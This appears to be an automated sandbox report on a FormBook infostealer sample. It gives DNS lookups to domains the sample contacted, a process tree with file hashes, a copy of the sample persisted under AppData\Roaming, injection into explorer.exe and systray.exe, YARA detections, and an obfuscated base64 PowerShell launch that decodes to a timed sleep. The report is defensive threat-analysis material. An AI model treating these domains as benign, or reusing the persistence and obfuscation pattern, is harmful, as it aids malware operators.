Mar 21, 2023 09:12:30.799199104 CET | 192.168.2.5 | 8.8.8.8 | 0x55c | Standard query (0) | www.funhood.life | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 21, 2023 09:10:10.190110922 CET | 8.8.8.8 | 192.168.2.5 | 0x51ae | No error (0) | a.uguu.se | | 188.40.83.211 | A (IP address) | IN (0x0001) | false
Mar 21, 2023 09:11:06.080689907 CET | 8.8.8.8 | 192.168.2.5 | 0x4cc7 | No error (0) | a.uguu.se | | 188.40.83.211 | A (IP address) | IN (0x0001) | false
Mar 21, 2023 09:11:12.570863962 CET | 8.8.8.8 | 192.168.2.5 | 0x4c7c | No error (0) | a.uguu.se | | 188.40.83.211 | A (IP address) | IN (0x0001) | false
Mar 21, 2023 09:11:27.439889908 CET | 8.8.8.8 | 192.168.2.5 | 0x796e | No error (0) | www.findmyoriginstory.com | | 74.208.236.131 | A (IP address) | IN (0x0001) | false
Mar 21, 2023 09:11:32.756217957 CET | 8.8.8.8 | 192.168.2.5 | 0xd6de | Name error (3) | www.myprojoints.com | none | none | A (IP address) | IN (0x0001) | false
Mar 21, 2023 09:11:33.796116114 CET | 8.8.8.8 | 192.168.2.5 | 0x8005 | Name error (3) | www.myprojoints.com | none | none | A (IP address) | IN (0x0001) | false
Mar 21, 2023 09:11:38.865930080 CET | 8.8.8.8 | 192.168.2.5 | 0x9a6f | No error (0) | www.emprendizajesocial.com | | 217.160.0.229 | A (IP address) | IN (0x0001) | false
Mar 21, 2023 09:11:52.655042887 CET | 8.8.8.8 | 192.168.2.5 | 0xae8b | No error (0) | www.brunaeleandro.com | brunaeleandro.com | | CNAME (Canonical name) | IN (0x0001) | false
Mar 21, 2023 09:11:52.655042887 CET | 8.8.8.8 | 192.168.2.5 | 0xae8b | No error (0) | brunaeleandro.com | | 54.85.86.211 | A (IP address) | IN (0x0001) | false
Mar 21, 2023 09:12:02.859888077 CET | 8.8.8.8 | 192.168.2.5 | 0x2e15 | No error (0) | www.madisoncountylincoln.com | | 172.67.152.24 | A (IP address) | IN (0x0001) | false
Mar 21, 2023 09:12:02.859888077 CET | 8.8.8.8 | 192.168.2.5 | 0x2e15 | No error (0) | www.madisoncountylincoln.com | | 104.21.65.231 | A (IP address) | IN (0x0001) | false
Mar 21, 2023 09:12:10.800434113 CET | 8.8.8.8 | 192.168.2.5 | 0xf69 | No error (0) | www.metatv.app | | 172.67.194.225 | A (IP address) | IN (0x0001) | false
Mar 21, 2023 09:12:10.800434113 CET | 8.8.8.8 | 192.168.2.5 | 0xf69 | No error (0) | www.metatv.app | | 104.21.20.242 | A (IP address) | IN (0x0001) | false
Mar 21, 2023 09:12:30.833955050 CET | 8.8.8.8 | 192.168.2.5 | 0x55c | No error (0) | www.funhood.life | | 162.213.249.254 | A (IP address) | IN (0x0001) | false
                                                                            • a.uguu.se
                                                                            • www.findmyoriginstory.com
                                                                            • www.emprendizajesocial.com
                                                                            • www.brunaeleandro.com
                                                                            • www.madisoncountylincoln.com
                                                                            • www.metatv.app


                                                                            Target ID:0
                                                                            Start time:09:10:07
                                                                            Start date:21/03/2023
                                                                            Path:C:\Users\user\Desktop\SC_0017384.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\Desktop\SC_0017384.exe
                                                                            Imagebase:0xcf0000
                                                                            File size:692224 bytes
                                                                            MD5 hash:F296A60E1568722B060DE70B46357FE6
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.401744017.0000000006980000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low

                                                                            Target ID:1
                                                                            Start time:09:10:18
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                            Imagebase:0xdd0000
                                                                            File size:430592 bytes
                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Reputation:high

                                                                            Target ID:2
                                                                            Start time:09:10:18
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7fcd70000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Target ID:3
                                                                            Start time:09:10:45
                                                                            Start date:21/03/2023
                                                                            Path:C:\Users\user\Desktop\SC_0017384.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\Desktop\SC_0017384.exe
                                                                            Imagebase:0xc20000
                                                                            File size:692224 bytes
                                                                            MD5 hash:F296A60E1568722B060DE70B46357FE6
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            Reputation:low

                                                                            Target ID:4
                                                                            Start time:09:10:48
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\explorer.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                            Imagebase:0x7ff69bc80000
                                                                            File size:3933184 bytes
                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Target ID:5
                                                                            Start time:09:10:57
                                                                            Start date:21/03/2023
                                                                            Path:C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
                                                                            Imagebase:0x250000
                                                                            File size:692224 bytes
                                                                            MD5 hash:F296A60E1568722B060DE70B46357FE6
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 13%, ReversingLabs
                                                                            Reputation:low

                                                                            Target ID:8
                                                                            Start time:09:11:05
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\SysWOW64\systray.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\systray.exe
                                                                            Imagebase:0xea0000
                                                                            File size:9728 bytes
                                                                            MD5 hash:1373D481BE4C8A6E5F5030D2FB0A0C68
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            Reputation:moderate

                                                                            Target ID:9
                                                                            Start time:09:11:07
                                                                            Start date:21/03/2023
                                                                            Path:C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
                                                                            Imagebase:0x160000
                                                                            File size:692224 bytes
                                                                            MD5 hash:F296A60E1568722B060DE70B46357FE6
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Reputation:low

                                                                            Target ID:10
                                                                            Start time:09:11:33
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                            Imagebase:0xdd0000
                                                                            File size:430592 bytes
                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Reputation:high

                                                                            Target ID:11
                                                                            Start time:09:11:33
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7fcd70000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language

                                                                            Target ID:12
                                                                            Start time:09:11:43
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                            Imagebase:0xdd0000
                                                                            File size:430592 bytes
                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:.Net C# or VB.NET

                                                                            Target ID:13
                                                                            Start time:09:11:44
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7fcd70000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language

                                                                            Target ID:14
                                                                            Start time:09:11:58
                                                                            Start date:21/03/2023
                                                                            Path:C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
                                                                            Imagebase:0xa30000
                                                                            File size:692224 bytes
                                                                            MD5 hash:F296A60E1568722B060DE70B46357FE6
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language

                                                                            Target ID:16
                                                                            Start time:09:12:09
                                                                            Start date:21/03/2023
                                                                            Path:C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
                                                                            Imagebase:0x950000
                                                                            File size:692224 bytes
                                                                            MD5 hash:F296A60E1568722B060DE70B46357FE6
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language

                                                                            No disassembly